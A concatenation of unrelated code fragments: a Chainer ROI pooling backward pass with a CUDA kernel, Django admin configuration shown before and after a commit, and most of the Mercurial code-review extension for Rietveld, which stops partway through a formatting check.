pwstart = min(max(pwstart, 0), self.outw)
pwend = min(max(pwend, 0), self.outw)
for ph in six.moves.range(phstart, phend):
for pw in six.moves.range(pwstart, pwend):
max_idx_tmp = self.argmax_data[i_roi, :, ph, pw]
for c in six.moves.range(channels):
if max_idx_tmp[c] == (h * width + w):
bottom_delta[idx, c, h, w] += \
gy[0][i_roi, c, ph, pw]
return bottom_delta, None
def backward_gpu(self, inputs, gy):
bottom_data, bottom_rois = inputs
channels, height, width = bottom_data.shape[1:]
bottom_diff = cuda.cupy.zeros_like(bottom_data, dtype=numpy.float32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 top_diff, raw int32 argmax_data, int32 num_rois,
float32 spatial_scale, int32 channels, int32 height, int32 width,
int32 pooled_height, int32 pooled_width, raw float32 bottom_rois
''',
'float32 bottom_diff',
'''
int w = i % width;
int h = (i / width) % height;
int c = (i / width / height) % channels;
int num = i / width / height / channels;
float gradient = 0;
// Accumulate gradient over all ROIs that pooled this element
for (int roi_n = 0; roi_n < num_rois; ++roi_n) {
// Skip if ROI's batch index doesn't match num
if (num != static_cast<int>(bottom_rois[roi_n * 5])) {
continue;
}
int roi_start_w = round(bottom_rois[roi_n * 5 + 1]
* spatial_scale);
int roi_start_h = round(bottom_rois[roi_n * 5 + 2]
* spatial_scale);
int roi_end_w = round(bottom_rois[roi_n * 5 + 3]
* spatial_scale);
int roi_end_h = round(bottom_rois[roi_n * 5 + 4]
* spatial_scale);
// Skip if ROI doesn't include (h, w)
const bool in_roi = (w >= roi_start_w && w <= roi_end_w &&
h >= roi_start_h && h <= roi_end_h);
if (!in_roi) {
continue;
}
int offset = (roi_n * channels + c) * pooled_height
* pooled_width;
// Compute feasible set of pooled units that could have pooled
// this bottom unit
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int phstart = floor(static_cast<float>(h - roi_start_h)
/ bin_size_h);
int phend = ceil(static_cast<float>(h - roi_start_h + 1)
/ bin_size_h);
int pwstart = floor(static_cast<float>(w - roi_start_w)
/ bin_size_w);
int pwend = ceil(static_cast<float>(w - roi_start_w + 1)
/ bin_size_w);
phstart = min(max(phstart, 0), pooled_height);
phend = min(max(phend, 0), pooled_height);
pwstart = min(max(pwstart, 0), pooled_width);
pwend = min(max(pwend, 0), pooled_width);
for (int ph = phstart; ph < phend; ++ph) {
for (int pw = pwstart; pw < pwend; ++pw) {
int index_ = ph * pooled_width + pw + offset;
if (argmax_data[index_] == (h * width + w)) {
gradient += top_diff[index_];
}
}
}
}
bottom_diff = gradient;
''', 'roi_pooling_2d_bwd'
)(gy[0], self.argmax_data, bottom_rois.shape[0], self.spatial_scale,
channels, height, width, self.outh, self.outw,
bottom_rois, bottom_diff)
return bottom_diff, None
def roi_pooling_2d(x, rois, outh, outw, spatial_scale):
"""Spatial Region of Interest (ROI) pooling function.
This function acts similarly to :class:`~functions.MaxPooling2D`, but
it computes the maximum of input spatial patch for each channel
with the region of interest.
Args:
x (~chainer.Variable): Input variable.
rois (~chainer.Variable): Input roi variable.
outh (int): Height of output image after pooled.
outw (int): Width of output image after pooled.
spatial_scale (float): scale of the roi is resized.
Returns:
~chainer.Variable: Ouptut variable.
See the original paper proposing ROIPooling:
`Fast R-CNN <http://arxiv.org/abs/1504.08083>`_.
"""
return ROIPooling2D(outh, outw, spatial_scale)(x, rois)
|
Initial version of Pelican HTML sanity plugin.
This is needed by basically everything else, so it comes first.
|
from django.contrib import admin
from .models import *
class UserProfileAdmin(admin.ModelAdmin):
fieldsets = [
(None, {'fields': ['user', 'fullname', 'githubuser', 'email','website']}),
('Biography', {'fields': ['bio']}),
('Activity', {'fields': ['active','activity_status']}),
]
list_display = ('user', 'fullname', 'githubuser', 'activity_status')
list_filter = ('activity_status',)
admin.site.register(Task)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(Project)
Customized projects and tasks in admin interface
from django.contrib import admin
from .models import *
class ProjectInline(admin.TabularInline):
model = Project
class UserProfileAdmin(admin.ModelAdmin):
fieldsets = [
(None, {'fields': ['user', 'fullname', 'githubuser', 'email','website']}),
('Biography', {'fields': ['bio']}),
('Activity', {'fields': ['active','activity_status']}),
]
list_display = ('user', 'fullname', 'githubuser', 'activity_status')
list_filter = ('activity_status',)
inlines = [
ProjectInline,
]
class ProjectAdmin(admin.ModelAdmin):
fieldsets = [
(None, {'fields': ['project_name', 'status_id', 'project_owner']}),
('Project details', {'fields': ['project_description', 'project_deadline', 'repository_link', 'website_production', 'website_test', ]}),
]
list_display = ('project_name', 'status_id', 'project_deadline',)
list_filter = ('status_id',)
class TaskAdmin(admin.ModelAdmin):
fieldsets = [
(None, {'fields': ['title', 'status', 'owner_id', 'project_id']}),
('Task details', {'fields': ['description', 'deadline', ]}),
]
list_display = ('title', 'status', 'assigned_id',)
list_filter = ('assigned_id',)
admin.site.register(Task, TaskAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
admin.site.register(Project, ProjectAdmin)
|
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re, time
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
# The standard 'json' package is new in Python 2.6.
# Before that it was an external package named simplejson.
try:
# Standard location in 2.6 and beyond.
import json
except Exception, e:
try:
# Conventional name for earlier package.
import simplejson as json
except:
try:
# Was also bundled with django, which is commonly installed.
from django.utils import simplejson as json
except:
# We give up.
raise e
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
try:
from mercurial.discovery import findcommonincoming
except:
def findcommonincoming(repo, remote):
return repo.findcommonincoming(remote)
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < '1.3':
msg = oldMessage
if os.access("/etc/mercurial", 0):
msg += linuxMessage
raise util.Abort(msg)
def promptyesno(ui, msg):
# Arguments to ui.prompt changed between 1.3 and 1.3.1.
# Even so, some 1.3.1 distributions seem to have the old prompt!?!?
# What a terrible way to maintain software.
try:
return ui.promptchoice(msg, ["&yes", "&no"], 0) == 0
except AttributeError:
return ui.prompt(msg, ["&yes", "&no"], "y") != "n"
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
server = "codereview.appspot.com"
server_url_base = None
defaultcc = None
contributors = {}
missing_codereview = None
real_rollback = None
releaseBranch = None
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
if type(s) != t:
raise util.Abort("type check failed: %s has type %s != %s" % (repr(s), type(s), t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
typecheck(s, str)
return s.decode("utf-8")
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
from mercurial import encoding
encoding.encoding = 'utf-8'
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
import sys
reload(sys) # site.py deleted setdefaultencoding; get it back
sys.setdefaultencoding('utf-8')
default_to_utf8()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
def __init__(self, name):
typecheck(name, str)
self.name = name
self.desc = ''
self.files = []
self.reviewer = []
self.cc = []
self.url = ''
self.local = False
self.web = False
self.copied_from = None # None means current user
self.mailed = False
self.private = False
def DiskText(self):
cl = self
s = ""
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n\n"
if cl.private:
s += "Private: " + str(self.private) + "\n"
s += "Mailed: " + str(self.mailed) + "\n"
s += "Description:\n"
s += Indent(cl.desc, "\t")
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
typecheck(s, str)
return s
def EditorText(self):
cl = self
s = _change_prolog
s += "\n"
if cl.copied_from:
s += "Author: " + cl.copied_from + "\n"
if cl.url != '':
s += 'URL: ' + cl.url + ' # cannot edit\n\n'
if cl.private:
s += "Private: True\n"
s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
s += "CC: " + JoinComma(cl.cc) + "\n"
s += "\n"
s += "Description:\n"
if cl.desc == '':
s += "\t<enter description here>\n"
else:
s += Indent(cl.desc, "\t")
s += "\n"
if cl.local or cl.name == "new":
s += "Files:\n"
for f in cl.files:
s += "\t" + f + "\n"
s += "\n"
typecheck(s, str)
return s
def PendingText(self):
cl = self
s = cl.name + ":" + "\n"
s += Indent(cl.desc, "\t")
s += "\n"
if cl.copied_from:
s += "\tAuthor: " + cl.copied_from + "\n"
s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
typecheck(s, str)
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
if sys.platform == "win32" and os.path.isfile(path):
os.remove(path)
os.rename(path+'!', path)
if self.web and not self.copied_from:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
private=self.private)
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
typecheck(s, str)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
if not self.files and not creating:
ui.warn("no files in change list\n")
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
set_status("uploading CL metadata + diffs")
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
]
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = None
# We do not include files when creating the issue,
# because we want the patch sets to record the repository
# and base revision they are diffs against. We use the patch
# set message for that purpose, but there is no message with
# the first patch set. Instead the message gets used as the
# new CL's overall subject. So omit the diffs when creating
# and then we'll run an immediate upload.
# This has the effect that every CL begins with an empty "Patch set 1".
if self.files and not creating:
vcs = MercurialVCS(upload_options, ui, repo)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
else:
uploaded_diff_file = [("data", "data.diff", emptydiff)]
if vcs and self.name != "new":
form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + getremote(ui, repo, {}).path))
else:
# First upload sets the subject for the CL itself.
form_fields.append(("subject", self.Subject()))
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
if response_body.startswith("Issue updated.") and quiet:
pass
else:
ui.status(msg + "\n")
set_status("uploaded CL metadata + diffs")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
set_status("uploading patches")
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
if vcs:
set_status("uploading base files")
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
set_status("sending mail")
MySend("/" + issue + "/mail", payload="")
self.web = True
set_status("flushing changes to disk")
self.Flush(ui, repo)
return
def Mail(self, ui, repo):
pmsg = "Hello " + JoinComma(self.reviewer)
if self.cc:
pmsg += " (cc: %s)" % (', '.join(self.cc),)
pmsg += ",\n"
pmsg += "\n"
repourl = getremote(ui, repo, {}).path
if not self.mailed:
pmsg += "I'd like you to review this change to\n" + repourl + "\n"
else:
pmsg += "Please take another look.\n"
typecheck(pmsg, str)
PostMessage(ui, self.name, pmsg, subject=self.Subject())
self.mailed = True
self.Flush(ui, repo)
def GoodCLName(name):
typecheck(name, str)
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
typecheck(text, str)
typecheck(name, str)
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
'Mailed': '',
'Private': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.copied_from = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
line = line.strip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if sections['Mailed'] != 'False':
# Odd default, but avoids spurious mailings when
# reading old CLs that do not have a Mailed: line.
# CLs created with this update will always have
# Mailed: False on disk.
cl.mailed = True
if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
cl.private = True
if cl.desc == '<enter description here>':
cl.desc = ''
return cl, 0, ''
def SplitCommaSpace(s):
typecheck(s, str)
s = s.strip()
if s == "":
return []
return re.split(", *", s)
def CutDomain(s):
typecheck(s, str)
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
for s in l:
typecheck(s, str)
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
typecheck(name, str)
set_status("loading CL " + name)
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
set_status("getting issue metadata from web")
d = JSONGet(ui, "/api/" + name + "?messages=true")
set_status(None)
if d is None:
return None, "cannot load CL %s from server" % (name,)
if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
return None, "malformed response loading CL data from code review server"
cl.dict = d
cl.reviewer = d.get('reviewers', [])
cl.cc = d.get('cc', [])
if cl.local and cl.copied_from and cl.desc:
# local copy of CL written by someone else
# and we saved a description. use that one,
# so that committers can edit the description
# before doing hg submit.
pass
else:
cl.desc = d.get('description', "")
cl.url = server_url_base + name
cl.web = True
cl.private = d.get('private', False) != False
set_status("loaded CL " + name)
return cl, ''
global_status = None
def set_status(s):
# print >>sys.stderr, "\t", time.asctime(), s
global global_status
global_status = s
class StatusThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
# pause a reasonable amount of time before
# starting to display status messages, so that
# most hg commands won't ever see them.
time.sleep(30)
# now show status every 15 seconds
while True:
time.sleep(15 - time.time() % 15)
s = global_status
if s is None:
continue
if s == "":
s = "(unknown status)"
print >>sys.stderr, time.asctime(), s
def start_status_thread():
t = StatusThread()
t.setDaemon(True) # allowed to exit if t is still running
t.start()
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
typecheck(url, str)
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
typecheck(dir, str)
return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
i = 0
while i < len(line) and line[i] == '\t':
i += 1
return ' '*(8*i) + line[i:]
# Strip maximal common leading white space prefix from text
def StripCommon(text):
typecheck(text, str)
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
line = TabsToSpaces(line)
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
line = TabsToSpaces(line)
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
typecheck(t, str)
return t
# Indent text with indent.
def Indent(text, indent):
typecheck(text, str)
typecheck(indent, str)
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
typecheck(t, str)
return t
# Return the first line of l
def line1(text):
typecheck(text, str)
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions
# Get effective change nodes taking into account applied MQ patches
def effective_revpair(repo):
try:
return cmdutil.revpair(repo, ['qparent'])
except:
return cmdutil.revpair(repo, None)
# Return list of changed files in repository that match pats.
# Warn about patterns that did not match.
def matchpats(ui, repo, pats, opts):
matcher = cmdutil.match(repo, pats, opts)
node1, node2 = effective_revpair(repo)
modified, added, removed, deleted, unknown, ignored, clean = repo.status(node1, node2, matcher, ignored=True, clean=True, unknown=True)
return (modified, added, removed, deleted, unknown, ignored, clean)
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, opts, taken=None):
taken = taken or {}
# Run each pattern separately so that we can warn about
# patterns that didn't do anything useful.
for p in pats:
modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
redo = False
for f in unknown:
promptadd(ui, repo, f)
redo = True
for f in deleted:
promptremove(ui, repo, f)
redo = True
if redo:
modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, [p], opts)
for f in modified + added + removed:
if f in taken:
ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
if not modified and not added and not removed:
ui.warn("warning: %s did not match any modified files\n" % (p,))
# Again, all at once (eliminates duplicates)
modified, added, removed = matchpats(ui, repo, pats, opts)[:3]
l = modified + added + removed
l.sort()
if taken:
l = Sub(l, taken.keys())
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
modified, added = matchpats(ui, repo, pats, opts)[:2]
l = modified + added
l.sort()
return l
# Return list of files claimed by existing CLs
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
return ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
def getremote(ui, repo, opts):
# save $http_proxy; creating the HTTP repo object will
# delete it in an attempt to "help"
proxy = os.environ.get('http_proxy')
source = hg.parseurl(ui.expandpath("default"), None)[0]
try:
remoteui = hg.remoteui # hg 1.6
except:
remoteui = cmdutil.remoteui
other = hg.repository(remoteui(repo, opts), source)
if proxy is not None:
os.environ['http_proxy'] = proxy
return other
def Incoming(ui, repo, opts):
_, incoming, _ = findcommonincoming(repo, getremote(ui, repo, opts))
return incoming
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptremove(ui, repo, f):
if promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
if commands.remove(ui, repo, 'path:'+f) != 0:
ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
if promptyesno(ui, "hg add %s (y/n)?" % (f,)):
if commands.add(ui, repo, 'path:'+f) != 0:
ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
set_status(None) # do not show status
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
clx, line, err = ParseCL(s, cl.name)
if err != '':
if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
return "change list not modified"
continue
# Check description.
if clx.desc == '':
if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
continue
elif re.search('<enter reason for undo>', clx.desc):
if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
continue
elif not re.match(desc_re, clx.desc.split('\n')[0]):
if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
continue
# Check file list for files that need to be hg added or hg removed
# or simply aren't understood.
pats = ['path:'+f for f in clx.files]
modified, added, removed, deleted, unknown, ignored, clean = matchpats(ui, repo, pats, {})
files = []
for f in clx.files:
if f in modified or f in added or f in removed:
files.append(f)
continue
if f in deleted:
promptremove(ui, repo, f)
files.append(f)
continue
if f in unknown:
promptadd(ui, repo, f)
files.append(f)
continue
if f in ignored:
ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
continue
if f in clean:
ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
files.append(f)
continue
p = repo.root + '/' + f
if os.path.isfile(p):
ui.warn("warning: %s is a file but not known to hg\n" % (f,))
files.append(f)
continue
if os.path.isdir(p):
ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
continue
ui.warn("error: %s does not exist; omitting\n" % (f,))
clx.files = files
cl.desc = clx.desc
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
cl.private = clx.private
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
if not cl.files:
return None, "no files changed"
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if defaultcc:
cl.cc = Add(cl.cc, defaultcc)
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=None, opts=None, globbed=False, default='relpath'):
taken = []
files = []
pats = pats or []
opts = opts or {}
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if not GoodCLName(clname):
raise util.Abort("invalid CL name " + clname)
cl, err = LoadCL(repo.ui, repo, clname, web=False)
if err != '':
raise util.Abort("loading CL " + clname + ": " + err)
if not cl.files:
raise util.Abort("no files in CL " + clname)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
def CheckFormat(ui, repo, files, just_warn=False):
set_status("running gofmt")
CheckGofmt(ui, repo, files, just_warn)
CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
files = [f for f in files if (f.startswith('src/') or f.startswith('test/bench/')) and f.endswith('.go')]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
if not files:
return
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
cmd.stdin.close()
except:
raise util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
set_status("done with gofmt")
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise util.Abort(msg)
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
